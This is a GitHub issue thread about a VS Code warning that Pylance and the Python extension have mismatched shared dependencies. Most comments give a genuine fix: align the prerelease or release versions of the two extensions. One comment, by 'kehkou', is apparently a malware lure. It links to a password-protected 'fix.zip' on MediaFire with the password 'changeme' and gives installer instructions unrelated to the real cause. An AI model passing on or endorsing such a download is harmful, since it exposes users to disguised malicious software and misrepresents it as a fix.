### ISSUE TITLE
New error message when i launch VScode

### ISSUE THREAD

**Issue by Jacques2101** [microsoft/pylance-release#6322]
## Environment data

-   Pylance version: v2024.8.104 (pre-release)
-   OS and version: Windows
-   Python version (& distribution if applicable, e.g. Anaconda): Miniconda Python 3.10

When i launch VScode i get a new error message wich is:
"Pylance et l’extension Python ont des dépendances partagées incompatibles. Vérifiez que les deux extensions sont la dernière version préliminaire. Pylance utilisant {0}. Python utilisant {1}."

Sorry it's in french but it means: 
“Pylance and the Python extension have incompatible shared dependencies. Ensure both extensions are the latest preview version. Pylance is using {0}. Python is using {1}.”

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sittingpilgrim** [comment]
I was getting a similar error :
Pylance and Python extension have incompatible shared dependencies.
Please make sure both extensions are the latest prerelease version.
Pylance using vscode-languageclient:^10.0.0-next.12.
Python using vscode-languageclient:^10.0.0-next.2.

Turns out I was using a prerelease version of Pylance, but not of Python extension.
I switched Pylance to use release version instead, error message disappeared.  I could probably have switched Python extension to be pre-release, but won't do that unless there is a need.

**Comment by rchiodo** [comment]
This is on purpose actually. It indicates you should upgrade one of your extensions (or downgrade one as @sittingpilgrim did). Pylance and the Python extension share an API and if they have different versions of an internal npm package, they may break. This warning is to ensure you have them in sync.

**Comment by Jacques2101** [comment]
Ok thx

**Comment by edwinmambo** [comment]
> I was getting a similar error : Pylance and Python extension have incompatible shared dependencies. Please make sure both extensions are the latest prerelease version. Pylance using vscode-languageclient:^10.0.0-next.12. Python using vscode-languageclient:^10.0.0-next.2.
> 
> Turns out I was using a prerelease version of Pylance, but not of Python extension. I switched Pylance to use release version instead, error message disappeared. I could probably have switched Python extension to be pre-release, but won't do that unless there is a need.

This works and solves the issue. It seems to be a mismatch of version of Pylance and Python extensions.
